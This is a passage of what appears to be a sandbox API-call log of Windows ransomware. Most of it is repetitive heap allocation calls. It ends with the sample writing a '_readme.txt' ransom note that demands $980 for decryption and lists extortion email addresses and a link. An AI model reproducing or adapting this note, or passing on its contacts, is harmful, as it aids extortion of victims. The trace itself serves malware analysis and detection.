out: hHeap=0x6a0000) returned 1 [0179.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.507] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0179.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.507] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.507] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.507] PathFindFileNameW (pszPath="") returned="" [0179.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.507] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.508] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0179.508] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0179.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.508] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.508] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0179.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.509] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0179.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.509] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our 